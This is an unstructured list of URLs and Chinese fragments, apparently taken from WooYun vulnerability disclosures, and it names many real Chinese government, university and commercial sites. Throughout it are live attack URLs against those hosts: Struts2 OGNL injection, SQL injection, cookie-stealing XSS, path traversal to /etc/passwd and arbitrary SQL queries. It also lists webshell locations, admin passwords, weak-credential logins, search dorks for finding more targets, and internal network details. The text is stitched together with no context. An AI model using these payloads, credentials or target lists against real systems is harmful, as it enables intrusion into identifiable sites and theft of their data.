http://www.bwmayflowers.com.cn/get_password.html http://www.happiness-hotel.com/ http://www.glamorhotel.com/get_password.html http://www.baohonghotel.com/get_password.html http://www.wuzhishanyatai.com/get_password.html http://www.vilihotel.com/get_password.html http://www.lndfhotel-sh.com/get_password.html http://www.hainanyataihotel.com/get_password.html http://www.jbstel.com/get_password.html http://www.87198677.com/get_password.html http://www.margaretresort.com/get_password.html http://www.wenfenghotel.com/get_password.html http://www.ytxml.com/get_password.html http://www.hbdlds.com/get_password.html http://www.lzshotel.com/get_password.html http://www.gdyutonghotel.com/get_password.html http://www.jinyanhotspring.com/login.html http://www.sdlyfl.com/get_password.html http://www.xn--cerp49b31r6wv.com/member_forget.html http://www.phoenixcne.de/important_news_content.php?news_id=133837 http://www.phoenixcne.de/myadmin/login.php http://yfzx.hicc.cn/getDetails.action http://cfcs.org.cn/zh/index.action http://www.able-elec.com/ http://218.241.222.230/G2S/AdminSpace/QE/AddCustomForm.aspx http://kczx.hnist.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://biz.sandau.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://gxk.scu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://www9.xjmu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://sducc.sandau.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://kczx.sppc.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://kczx.sus.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://course.hzau.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://course.ujn.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://202.194.131.160/G2S/AdminSpace/QE/AddCustomForm.aspx http://ocw.sjtu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://116.236.150.117/G2S/AdminSpace/QE/AddCustomForm.aspx http://wlkc.forestpolice.net/G2S/AdminSpace/QE/AddCustomForm.aspx http://202.201.224.60/G2S/AdminSpace/QE/AddCustomForm.aspx http://kczx.xhu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.usst.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://220.163.113.53/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.xjtu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.jlu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.xjtu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.xjtu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.scu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://e-learning.ecust.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.shnu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.sjtu.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://cc.sbs.edu.cn/G2S/AdminSpace/QE/AddCustomForm.aspx http://www.xxoo.com/G2S/AdminSpace/QE/AddCustomForm.aspx http://60.247.77.187/ http://drops.wooyun.org/papers/1383 http://112.91.66.72/mall/goods/help/index.html?id=3462617 http://112.91.66.72/login/verify.html?v=543b8ed9166b2 http://112.91.66.72/register/verify.html?v=543b8ed98b65d http://112.91.66.72/mall/goods/help.html?id=3462617&theme=v2 http://www.ssap.com.cn/member/Member_SeenData.aspx?userid=38424 http://books.ssap.com.cn/MallStore/Store_Periodical.aspx?bookclass=449 http://www.ssap.com.cn/SKWX/Job_Show.aspx?Hr_id=112 http://www.ssap.com.cn/Shop/BookMainContent.aspx?ProductManager_Id=20121120093656 http://books.ssap.com.cn/member/Member_Homepage.aspx?userid= http://deskadmin.cctv.com/ziliaoku.php?upid=* http://shop.yinyuetai.com http://shop.yinyuetai.com/detail/304 http://123.125.203.140:9997/fapays/login.action http://123.125.203.140:9997/fapays/bjo1r.jsp http://123.125.203.140:9997/fapays/jspspy.jsp jdbc:oracle:thin:@192.168.1.186:1521:icdcdev jdbc:oracle:thin:@192.168.1.222:1521:orcl jdbc:oracle:thin:@10.0.0.12:1521:icdc http://www.hblsj.gov.cn/ShowVote.aspx?VoteID=7 http://www.hblsj.gov.cn/ShowVote.aspx?VoteID=7 http://app.spaqol.com/login.action https://yt.cfae.cn/slas/login.action https://yt.cfae.cn/slas/login.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 https://yt.cfae.cn/slas/test.jsp http://221.136.78.200/yyprojectaudit/login.action http://118.118.171.112:8080/ManageProject/login/login!login.action http://www.yldjw.gov.cn:88/platform/sysUser/idenUser.asp?username=admin&r=841&password=a http://www.yldjw.gov.cn:88/platform/sysUser/idenUser.asp?username=admin&r=841&password=a http://www.hkptg.com/shownews.php?catid=32&id=255 http://114.247.41.49/layoutAction!self.action inurl:/pmember.asp http://www.dlcxdrc.com/pmember.asp http://www.cxdrc.com/pmember.asp http://www.lncyrc.com.cn/pmember.asp http://www.lnbprsrc.com/pmember.asp http://www.fxrsw.cn/rencai/pmember.asp http://www.jobch263.com/pmember.asp http://site.czxh.gov.cn/job/pmember.asp http://www.lsqjy.cn/lsqjy/pmember.asp http://www.mlqgwyj.com/pmember.asp http://www.127mc.com/pmember.asp http://job0514.com/pmember.asp http://jianzhuzhuangshirc.97197.com/pmember.asp http://www.shtongda.com/pmember.asp http://www.yczjw.cn/pmember.asp http://mojurencai.48448.com/pmember.asp http://www.0857zp.com/pmember.asp http://wangluorencaiwang.99292.com/pmember.asp http://112.124.28.12/pmember.asp http://www.120hr.cn/pmember.asp http://www.cqtransit.com/xxx.php http://202.98.152.138:8153/yjsjwgl/ http://xxxx.com/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://golf.cctv.com/e/extend/court/court_search.php?pt=%E5%8C%97%E4%BA%AC IP:117.79.80.15进行全端口扫描,果然有许多端口开放,首先发下一些目录历遍的漏洞 http://117.79.80.15:8088/ http://117.79.80.15:18880/ ftp://117.79.80.15:16521/ http://117.79.80.15:16580/ https://mail.shenyang.com.cn/ https://mail.syprojects.gov.cn/ https://mail.syjzv.com/ https://mail.sywomen.org/ https://mail.syeic.com/ https://mail.sydzj.gov.cn/ https://mail.syzx.gov.cn/ https://mail.northeast.gov.cn/ https://mail.expo2006sy.gov.cn/ https://mail.orion-iso.cn/ https://mail.syidc.com/ https://mail.sygh.org/ http://www.gsfzb.gov.cn/(甘肃省政府法制信息网)可以进入到甘肃省法制办证件管理系统登陆页面(http://61.178.82.54:9090/zjgl/publicQueryCard.action) http://ka.gfan.com http://ka.gfan.com/search?q=1 https://www.jsgrain.gov.cn/ www.jsgrain.gov.cn http://mobile.dper.com/dper/login jar:/usr/local/tomcat/bin/../lib/cookie-java-agent-0.1.jar:/usr/local/tomcat/bin/../lib/byteman-2.1.2.jar http://mobile.dper.com/struts/webconsole.html http://115.29.236.28/oms/order_consignee_data_collector?ordercode=APECHI1230002312 http://115.29.236.28/oms/order_consignee_data_collector?ordercode=APECHI1230002312 http://tl.db.17173.com/suits.php?ItemName=&ItemClass=&MinLv=&MaxLv=&Nums=&ord=ItemName%7CDESC http://opac.sspu.edu.cn/opac/admin/ http://xlzx.kmust.edu.cn/main!newsView.action www.verymall.cn http://222.76.218.187:9002/hrpm/newsAction!getNewsAllInfo.action http://gjj.wh.cn/ http://218.22.66.214:8088/search_wh.aspx http://www.zcool.com.cn/event/winnerlist.do?cup=12&event_id=76&p=&pagesize=1000000&recommend=&sort= http://www.jxehe.com/ http://www.jxsyxx.com/Manage/ http://www.hnzwxx.com/Manage/ http://www.nhqms.com/Manage/ http://www.dbsdnhsy.com/Manage/ http://www.jxzljy.com/Manage/ http://www.jxgzyey.com/Manage/ https://ku6data.sdo.com https://ku6data.sdo.com/upload/ http://blog.suqian.gov.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://club.jledu.gov.cn/ss/batch.common.php?action=modelquote&cid=1&name=spacecomments http://op.yeepay.com/ http://op.yeepay.com/%3Csvg/onload=alert%28%29%3E http://op.yeepay.com/admin/%3Csvg/onload=alert%28%29%3E http://op.yeepay.com/index.jsp/%3Csvg/onload=alert%28%29%3E http://op.yeepay.com/admin/login.jsp http://202.108.8.97/ http://bbs.bee2c.com/forum.php http://mail.10035.com.cn/AppClientUpgrade/download.do http://mail.10035.com.cn/AppClientUpgrade/download.do http://novosti-kosmonavtiki.ru/forum/forum12/topic13702/ BY:N292143E1091008-N292620E1084558- LIMITS:SFC-UNL http://www.zte-e.com/cn/online.aspx http://seeyou.seecom.com.cn/中兴视通 http://seeyou.seecom.com.cn/web.rar http://cq01-hm-webtest01.vm.baidu.com:8800/web/welcome/login http://tongji.baidu.com/ http://pss.uestc.edu.cn/tasi/admin/ http://202.120.121.200/tasi/admin/ http://paper.sysu.edu.cn/TASi/admin/login.asp http://202.117.102.169/admin/ http://202.112.150.64/TASi/admin/ http://www.wintour.cn/ http://www.guangzhougdhhotel.com/ www.guangzhougdhhotel.com http://www.guangzhougdhhotel.com http://www.umeweb.cn/ www.lnredcross.org.cn/web/content.asp?id=46&articleid=1006 url:http://hope.haier.com/Article/index/detail?id=225181 http://huodong.2345.com/liuyan2/new.php?c=comment&a=new_&z=12&v=2 http://www.nhfpc.gov.cn/xxgk/pages/getManuscriptByType_manuscript.action?codeId=-1'%20OR%203*2*1%3d6%20AND%20000675%3d000675%20--%20&type=A_styleType http://61.49.18.66/xxgk/pages/getManuscriptByType_manuscript.action?codeId=-1'%20OR%203*2*1%3d6%20AND%20000675%3d000675%20--%20&type=A_styleType http://61.49.18.65/xxgk/pages/getManuscriptByType_manuscript.action?codeId=-1'%20OR%203*2*1%3d6%20AND%20000675%3d000675%20--%20&type=A_styleType http://xapp.baidu.com/ http://www.chizhoufgw.gov.cn/shownews.asp?auto_id=2845 http://www.erqi.gov.cn:8081/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://lib.cuc.edu.cn/opac_two/search2/s_detail.jsp?sid=0101074933 http://www.gs.whu.edu.cn/ziye/jiankao/login.aspx www.ieeyou.cn http://www.ieeyou.cn/init/uploadFile.jsp http://www.ieeyou.cn/updownFiles/xx.jsp/xx.jsp http://223.68.141.131/login.do?reqCode=init http://www.vasee.com/help/feedback.jsp http://bobobaby.com.cn http://bobobaby.com.cn/login.aspx http://bobobaby.com.cn/register.aspx http://bobobaby.com.cn/Uploadfile/image/user/yjha.asp http://bobobaby.com.cn/Uploadfile/image/user/1.asp www.ieeyou.cn http://www.ieeyou.cn/asms/index.jsp http://www.nxsuny.com http://nxsmnszs.com/about.asp?AsSortID=1 http://nxsmnszs.com/proinfo.asp?id=351 http://nxsmnszs.com/newsinfo.asp?id=369 http://nxsmnszs.com/message.asp?AsSortID=33 http://www.nxadmc.com/about.asp?AsSortID=3 http://www.nxadmc.com/proinfo.asp?id=198 http://www.nxadmc.com/newsinfo.asp?id=210 http://www.nxadmc.com/message.asp?AsSortID=4 http://www.ychysp.com/about.asp?AsSortID=1 http://www.ychysp.com/proinfo.asp?id=562 http://www.ychysp.com/newsinfo.asp?id=378 http://www.ychysp.com/message.asp?AsSortID=53 http://www.nxyatfl.com/about.asp?AsSortID=64 http://www.nxyatfl.com/proinfo.asp?id=530 http://www.nxyatfl.com/newsinfo.asp?id=424 http://www.nxyatfl.com/message.asp?AsSortID=63 http://www.qzlpgs.com/about.asp?AsSortID=54 http://www.qzlpgs.com/proinfo.asp?id=866 http://www.qzlpgs.com/newsinfo.asp?id=390 http://www.qzlpgs.com/message.asp?AsSortID=53 http://www.grace-english.com/about.asp?AsSortID=30 http://www.grace-english.com/proinfo.asp?id=331 http://www.grace-english.com/newsinfo.asp?id=340 http://www.grace-english.com/message.asp?AsSortID=33 http://www.nxdongcheng.com/about.asp?AsSortID=1 http://www.nxdongcheng.com/proinfo.asp?id=740 http://www.nxdongcheng.com/newsinfo.asp?id=885 http://www.nxdongcheng.com/Article/Message.asp?ID=378 http://www.nxksjc.com/about.asp?AsSortID=1 http://www.nxksjc.com/proinfo.asp?id=664 http://www.nxksjc.com/newsinfo.asp?id=682 http://www.nxksjc.com/message.asp?AsSortID=64 http://www.usana1992.com/about.asp?AsSortID=53 http://www.usana1992.com/proinfo.asp?id=379 http://www.usana1992.com/newsinfo.asp?id=370 http://www.usana1992.com/message.asp?AsSortID=52 http://gesenna.gotoip3.com/about.asp?AsSortID=67 http://gesenna.gotoip3.com/proinfo.asp?id=443 http://gesenna.gotoip3.com/newsinfo.asp?id=495 http://gesenna.gotoip3.com/message.asp?AsSortID=66 http://www.nxthbp.com/about.asp?AsSortID=1 http://www.nxthbp.com/proinfo.asp?id=409 http://www.nxthbp.com/newsinfo.asp?id=487 http://www.nxthbp.com/message.asp?AsSortID=52 http://www.nxycwy.net/about.asp?AsSortID=1 http://www.nxycwy.net/proinfo.asp?id=499 http://www.nxycwy.net/newsinfo.asp?id=532 http://www.nxycwy.net/message.asp?AsSortID=64 http://tjdag.gov.cn/tjdag/wwwroot/root/template/main/jgsl/lsbl_article.shtml?id=670 http://www.zgc-ft.gov.cn/adminindex.jsp http://ts.21cn.com任意投诉评论处,上传一图片 http://ts.21cn.com/Public/jQuery-File-Upload/server/php/files/14138672359707.png http://ts.21cn.com/Public/jQuery-File-Upload/ http://www.yivicar.com/home/help/view/id/47/name/foot.html http://www.yivicar.com/home/work/index.html?goaddxy=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%28document.cookie%29%3C/scRipt%3E http://www.auib.com.cn/product/是个管理页面,刚开始用awvs扫描发现的,用chrome打开空白页面,只能看到title,遂想到会不会浏览器版本的问题,换成IE7兼容模式果然看到如图页面 http://www.auib.com.cn/product/common/easyQueryVer3/EasyQueryVer3.js源码,其中有如图所示代码 http://www.auib.com.cn/product/common/easyQueryVer3/EasyQueryVer3Window.jsp?strSql=select%20*%20from%20fduserlogin,如图 http://www.auib.com.cn/product/download/download.jsp?FileName=../../../../../../../../../../etc/passwd,如图 http://oa.nstl.gov.cn/java-oa/index.jsp http://www.xtkfqjcy.gov.cn/index.asp http://www.xtkfqjcy.gov.cn/admin/login.asp http://222.73.220.177:8080/index.do http://192.168.1.105/discuz/uc_server/admin.php http://localhost/discuz/uc_server/admin.php?m=seccode&seccodeauth=250dIGq%2FYDhocuXf3IrsBkvB2k23JXlXAbuWr3X1liUcX94&7500 http://www.aapinche.cn/account/mobile.aspx?do=validmobile&Mobile=18156428592 www.aapinche.cn http://www.zhilelending.com/ http://202.85.219.134:8080/ http://www.dyk.com.cn:80/promotion/index?type=89 http://www.xxsfj.gov.cn/ http://www.xxsfj.gov.cn/master/login.php http://jiuye.swjtu.edu.cn:80/jdjy/CollegeManage/Major_detail.aspx?dptID=25 http://www.skynj.com/ inurl:homepages/content_page.aspx http://qlgk.taizhou.gov.cn/tzptweb/homepages/content_page_ex.aspx?id={661350D3-A37F-4D8E-A344-5E7A9932C97C http://58.222.195.110:8081/jyweb/homepages/content_page_ex.aspx?id={DB211DE3-1A77-4B16-8F30-D5B637B80FE2 http://61.178.185.50/tzweb/homepages/content_page_ex.aspx?id={A7B3B229-E087-45F9-A8AC-6C8AA4CCF98E http://58.213.129.206:8080/jytweb/homepages/content_page_ex.aspx?id={E1C5A45F-50FC-46F4-8210-A95F035DA8F4 http://qlgk.taixing.gov.cn/homepages/content_page_ex.aspx?id={863FB079-C6E8-45A4-BAD9-5CA2935376AF inurl:permissionitem_list_Sort.jspx?sortcode= http://www.kfxzzx.gov.cn/permissionitem_list_Sort.jspx?sortcode=003003&areaid=410203 http://222.143.52.13/permissionitem_list_Sort.jspx?sortcode=001001012&areaid=410100 http://www.gzegn.gov.cn/gzzfwz/permissionitem_list_Sort.jspx?sortcode=002018 http://smwsbsdt.xintai.gov.cn/permissionitem_list_Sort.jspx?sortcode=002001015 http://www.gazwzx.org:8888/permissionitem_list_Sort.jspx?sortcode=002006&areaid=520555 http://fw.hzzk.gov.cn/permissionitem_list_Sort.jspx?sortcode=001002004 http://www.zyszwdt.gov.cn/permissionitem_list_Sort.jspx?sortcode=002003002&areaid=620700 http://www.gzdpc.gov.cn:8080/gzzfwz/permissionitem_list_Sort.jspx?sortcode=002026 http://www.gzfg.gov.cn:8080/permissionitem_list_Sort.jspx?sortcode=002001017&areaid=520327 http://58.42.237.134:8888/permissionitem_list_Sort.jspx?sortcode=001015&areaid=520000 http://211.142.146.2:8016/permissionitem_list_Sort.jspx?sortcode=003004&areaid= http://wsbs.xinhui.gov.cn/permissionitem_list_Sort.jspx?sortcode=002001014&areaid=440705 http://www.dyhd315.gov.cn/ww315/VoteList.asp?webvoteid=13 http://dianping.lenovo.com.cn/valuation/index.php/index/search?k=think http://www.stegd.edu.cn/selfec/这个教育部网站,叫我去5184报考 http://www.qingting.fm/ http://zhanghongweigzs.com:8080/a.jsp http://qhld.ncu.edu.cn/show.asp?id=487 http://qhld.ncu.edu.cn/upload.asp http://qhld.ncu.edu.cn/login.asp username:admin password:admin159 www.aapinche.cn http://video.yundasys.com:8080/login.action http://www.xintai.gov.cn/siteserver/login.aspx https://github.com。依旧没有任何ssl错误的提醒,确认有证书盲注信任的漏洞。 http://mech.ncu.edu.cn/ArticleDisp.aspx?id=613 http://www.bohoog.com/ http://www.gzql.org/NewsSearch.aspx?TxtKey= http://www.gzswtzb.org.cn/NewsSearch.aspx?TxtKey= http://www.gyjydj.gov.cn/NewsSearch.aspx?TxtKey= http://www.gitsa.org/NewsSearch.aspx?TxtKey= http://www.gzzqy.net/NewsSearch.aspx?TxtKey= http://www.vip7885.com/NewsSearch.aspx?TxtKey= http://www.gzjlcs.gov.cn/NewsSearch.aspx?TxtKey= http://www.gzromon.com.cn/NewsSearch.aspx?TxtKey= http://www.jysjc.com:90/NewsSearch.aspx?TxtKey= http://sgrb.sgsgjt.com/NewsSearch.aspx?TxtKey= http://www.gzpack.net/NewsSearch.aspx?TxtKey= http://www.gzpack.net/NewsSearch.aspx?TxtKey= http://sgrb.sgsgjt.com/NewsSearch.aspx?TxtKey= http://rjt.czlib.net:8010/Softwarer/course/courseintro.asp?CODE=00038 http://sy2.hbdlib.cn/Softwarer/course/courseintro.asp?CODE=00059 http://27.115.0.215/Softwarer/course/courseintro.asp?CODE=00049 http://202.112.200.137/softwarer/course/courseintro.asp?CODE=00003 http://219.134.134.193:8082/Softwarer/course/courseintro.asp?CODE=00036 http://softstar.blcu6.edu.cn/softwarer/course/courseintro.asp?CODE=00030 http://www.softtone.cn/SoftWarer/course/courseintro.asp?CODE=00038 http://mmc.ncu.edu.cn/show.asp?id=563 www.runideas.com,还有多个地方分站 http://www.runideas.com/case/,有几十个行业,由于各个行业网站注入点不一定在同一个地方,因此下面提供的实例选了几个行业的供wooyun审核及厂家确认。 http://www.gdzsyy.net/news_detail.php?cid=2&id=103 http://www.gzmpc.com/index.php/Human/index/id/26 http://www.legacytaiwan.com/news_detail.php?cid=1&id=136 http://www.faithplus.cn/newsus.asp?id=71 http://www.zhong-yu.com.cn/news_detail.php?cid=1&id=32 http://www.guangchang-owens.com/news_detail.php?cid=1&id=29 http://www.56xh.org/news_detail.php?cid=13&id=6 http://www.wewapower.com.cn/news_detail.asp?ID=73 http://www.atek-china.com/en/products/products.asp?MaxID=2 http://www.sunshineent.com/ninfo_en.asp?id=24 http://www.guangchang-owens.com/news_detail.php?cid=1&id=29 http://www.deko-cn.com//topic.php?channelID=3&topicID=3 http://www.hirp.cn/cn/newslist.asp?n_type=1&cur=&n_id=142 http://www.gdforland.com/cn/news.asp?n_type=1&cur=&n_id=112 http://www.kendafarben.com.cn/news-details.aspx?category=14&id=12 http://www.vasled.com/product_list.asp http://www.hzysysh.com/news.asp http://www.hzgsl.org/news.asp http://www.gdgcc.com/sousuo.asp http://www.gdeic.com/standard.asp http://www.gcvidi.com/product.asp http://www.ohed.com/search.html?key=1 http://www.gdforland.com/cn/products.asp http://www.f-yg.cn/product.php http://www.lonon.com.cn/select_C.jsp?select=3&content=admin http://www.gdzsyy.net为例来证明注入漏洞存在 http://www.gdzsyy.net/news_detail.php?cid=2&id=103 http://www.zjgedz.gov.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://zhibiao.hexun.com/home/_IndexDetail_XG/6?indexid=395&indexclass=2&sort=fld_adddate&dire=desc http://www.bsrtv.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://www.kmgps.net/ http://vip.baihe.com/cms/batch.common.php?action=modelquote&cid=1&name=spacecomments http://gtzl.mlr.gov.cn/dataspace/person/d6bc9b03-ea89-4472-9126-cf5fa6b82ef9.jsp pwd:ninty http://www.phpwind.net/admin.php http://www.phpwind.net/windid/admin.php http://www.jzyy1949.com/jzyy/yiliao/pic/upload/e61c5308683945eba43698af8751b368.jsp http://shpaf.shu.edu.cn/GCSS/extra_page/printpage.asp?ArticleID=806 http://shpaf.shu.edu.cn/GCSS/admin/admin/login.asp http://wsyc.fengshun.cc/admin http://emotion.baihe.com/batch.common.php?action=modelquote&cid=1&name=spacecomments http://yczjj.yancheng.gov.cn/主站,溜达到权力阳光(http://218.92.192.197:7001/web/),尝试发现weblogic入口,弱口令weblogic直接进入。貌似配置有点问题,没敢乱动。 http://blog.cntv.cn/,用户A新建一个相册分类,进行编辑 http://**.**.**/doc/page/login.asp inurl:ReadBigClassmb.asp?id= http://www.polypm.com.cn/index.php?s=/Video/index/Catgory/1 http://i.fun.tv/网址,风行网客服页面 http://cms.voc.com.cn/voccgi/app/mobile/bbsapi/wxhn_login.php http://opinion.gbxxzyzx.com/manage/login/login!go http://218.106.115.38:8881/HPService/ http://218.106.115.38:8881/HPService/LoginAction!loginAction.action http://rzt.cfae.cn/ http://rzt.cfae.cn/jmx-console/ http://rzt.cfae.cn/is/index.jsp encap:Ethernet AC:C0:FA:0C:96 addr:10.10.33.33 Bcast:10.10.33.255 Mask:255.255.255.0 c0ff:fefa:c96/64 Scope:Link MTU:1500 packets:402211559 packets:537146083 txqueuelen:1000 http://www.dodoca.com/ http://daili.dodoca.com/ http://www.dodoca.com/ inurl:gov.cn/ShowNews.asp http://xxx.gov.cn/shownews.asp?id=xx&Bid=xx&Sid=xx http://www.chstats.gov.cn/shownews.asp?id=304&Bid=7&Sid= http://chssgw.gov.cn/shownews.asp?id=2545&Bid=4&Sid=25 http://www.chcj.gov.cn/shownews.asp?id=359&Bid=77&Sid=49 http://www.conghuajt.gov.cn/shownews.asp?id=381&Bid=76&Sid= http://www.chaudit.gov.cn/shownews.asp?id=230&Bid=77&Sid=46 http://www.chlt.gov.cn/shownews.asp?id=474&Bid=76&Sid= http://www.chny.gov.cn/shownews.asp?id=350&Bid=89&Sid=61 http://admin.diantai.ifeng.com/ http://diantai.ifeng.com http://admin.diantai.ifeng.com/index.php/cpupload/edititem/1093151 http://www.91job.gov.cn/p_register.aspx http://mobiletest.yeepay.com/ http://www.sta.sh.cn:8080/xjxy/sub14_detail.jsp?id=12507&num=mm&lm=49-5 http://sms.tootoo.cn/login.action http://222.38.19.234/ https://ebank.bankofbeijing.com.cn/bccbpb/downloadBJCA/bjcaotp.exe http://xh.sysu.edu.cn/inc/showNEWS.asp?id=151 http://media.baihe.com/batch.common.php?action=modelquote&cid=1&name=spacecomments http://www.ce.zju.edu.cn/cj/manage http://blog.dbw.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://www.bobobaby.com.cn/fckeditor/editor/fckeditor.html http://www.infojiading.cn/ http://www.infojiading.cn/Information.asp?TParentColumnId=0003 site:edu.cn http://www.busjz.com/index.html http://218.200.69.81:90/jzbusorg/Login_A4.aspx http://youni.im/index.php?r=login/Download&file= http://youni.im/index.php?r=login/Download&file=protected/config/main.php http://xapp.baidu.com/ http://www.fenqingba.com/index.php/display/freshkanjiang/12* http://www.zmdwsj.gov.cn/mainNew.action http://www.zmdwsj.gov.cn/mainNew.action http://ftp.fangguangsi.cn/1.php http://www.tzxzsp.gov.cn/egov/portals_zj/zjba/index.jsp?unid=8577D7EA3FF9F4EB2769534D1C224D8E http://www.xsbszx.gov.cn/was/xsqweb/djyd/index.jsp?unid=20100201-ADE2D7259CAF3C626176-11 http://fwzx.qingmeng.gov.cn:81/apas/portal/articlelist/index.jsp?pCateunid=BF96A69DB087B74C6CDCD497A1D817C8%27%20and%20%271%27=%271&cateunid=EECC5C2E36A34D7CE84EC063BB1C83D6(这个貌似参数名改了下,一样的) http://spzx.ouhai.gov.cn/was/was/web/wzouhai/wssp/serviceDetail.jsp?unid=A736149391BEDA5A30DE2E23F561C256 http://xzfwzx.wetdz.gov.cn/was/was/web/wzkaifaqu/wssp/serviceDetail.jsp?unid=96514A86DC0823D479194641F5633FB8 http://www.yhfw.gov.cn/was/portals/guide/service.jsp?unid=20100825-93855515A2525BF3B2F6-11 http://xzfwzx.wetdz.gov.cn/was/was/web/wzkaifaqu/wssp/serviceDetail.jsp?unid=96514A86DC0823D479194641F5633FB8 http://ga.wzcc.cn/newwzwas/wzwas/webapp/country/cnga/jsp/service.jsp?unid=F13FC1AD2AED4439B3D721BC29C33251 http://www.xsbszx.gov.cn/was/portals/webSend/service.jsp?unid=20120807-7B1712E4DA4D4C63718A-11 http://www.yhfw.gov.cn/was/portals/new/content.jsp?unid=20141020-6EBE1CDA07993AC2F35A-11 http://gss.feiren.com/updownFiles/xx.jsp/xx.jsp http://gss.feiren.com/updownFiles/xx.jsp/1.jsp http://mail.solarisbaby.com:8080/maintlogin.jsp http://www.fjhospital.com/fckeditor/editor/filemanager/connectors/test.html http://hlbers.gov.cn/VIPCompanyDetail.aspx?cid=hu279yrcj83112%27 http://club.ehuatai.com https://219.140.170.149/por/login_psw.csp?rnd=0.23481154129256765 https://account.oppo.com http://kdjyxk.post.gov.cn/register_logout.do server:/opt/app/jdk1.6.0_45/jre/lib/amd64:/opt/app/jdk1.6.0_45/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib http://java.sun.com/ http://bbs.share.youku.com/uc_server/admin.php?m=user&a=login&iframe=&sid= http://bbs.share.youku.com http://www.autohome.com.cn/ http://58.222.184.133/tzxyweb/project/entdept_creditinfo_page.aspx?id={E968C3E3-51C7-4071-ABEC-3552CBF7749F http://58.222.195.110:8081/jyxyweb/project/entdept_creditinfo_page.aspx?id=%7B0E586238-776C-45AA-8ED1-7B2E563C817C%7D http://58.222.212.114:82/project/entdept_creditinfo_page.aspx?id=%7BA218F21B-11E9-40B4-B2F4-D0E9912C0520%7D http://58.222.216.220/ggxygkweb/project/entdept_creditinfo_page.aspx?id=%7B2CEB2EC1-5F04-4741-9611-C9A23204DF0D%7D http://58.222.202.135:82/project/entdept_creditinfo_page.aspx?id=%7B057E366B-EF45-42D6-A362-AC4CC7517DB9%7D http://58.222.211.21/xhxyweb/project/entdept_creditinfo_page.aspx?id=%7B07B13319-8940-4501-8031-32565500E0DC%7D http://58.222.184.133/tzxyweb/project/entpeo_creditinfo_page.aspx?id=%7BBD37661D-313B-4BB3-A0F4-C5584A51E6C4%7D http://58.222.216.220/ggxygkweb/project/entpeo_creditinfo_page.aspx?id=%7B30F4EBB5-A298-4B9F-ADED-6FFAA2A17507%7D http://58.222.195.110:8081/jyxyweb/project/entpeo_creditinfo_page.aspx?id=%7B0A225809-C6D3-4EFB-9A80-F96A7206B260%7D http://58.222.212.114:82/project/entpeo_creditinfo_page.aspx?id=%7BCA7AFEF7-3E2D-40A1-9CD7-B6AC34D5270E%7D http://58.222.211.21/xhxyweb/project/entpeo_creditinfo_page.aspx?id=%7BB3CCEC94-4B0D-4FAA-B518-1147BB67E9DD%7D http://58.222.184.133/tzxyweb/project/project_info_page.aspx?id=%7B66B02592-5D98-4B7E-BC00-23964CA732C1%7D http://58.222.202.135:82/project/project_info_page.aspx?id=%7B81223F67-B3FC-4817-A028-166231F643EF%7D http://58.222.195.110:8081/jyxyweb/project/project_info_page.aspx?id=%7B6D2DF990-AE72-405A-AFA6-BC9903972698%7D http://58.222.212.114:82/project/project_info_page.aspx?id=%7B84C1347E-F2FC-4F1E-B4ED-88EEA87C744C%7D http://58.222.216.220/ggxygkweb/project/project_info_page.aspx?id=%7BA43ECDD1-3847-4688-8E22-C9A371C1E154%7D http://218.61.60.218/productadmin2/,http://218.61.60.217/iportaladmin/ www.gdpa.edu.cn/mmcnews/office/mmcinfo/view_file.php?id=221&work=view_file http://icrm.creditease.cn/login http://icrm.creditease.cn/media.jsp encap:Ethernet A9:B4:5B addr:10.150.180.123 Bcast:10.150.180.255 Mask:255.255.255.0 fea9:b45b/64 Scope:Link MTU:1500 packets:262663400 packets:302287758 txqueuelen:1000 http://oa.jinher.com/jc6/platform/sys/login!intro.action http://114.242.166.240/ http://xuexi.creditease.cn/website.rar http://rkjj.ahpfpc.gov.cn/MenuList.aspx?id=67 http://rkjj.ahpfpc.gov.cn/Newslist.aspx?key=1 http://521gx.com/Easy/Login2.aspx http://cyou0755.com/Easy/Login2.aspx http://www.ytjie.cn/Easy/Login2.aspx http://gxbdsp.com/Easy/Login2.aspx http://wr-sz.cn/Easy/Login2.aspx http://w250.es-cloud.net/Easy/Login2.aspx http://yidasiyin.com/Easy/Login2.aspx http://leaders56.com/Easy/Login2.aspx http://www.easaashop.cn/Easy/Login2.aspx http://61.136.101.71:8080/ 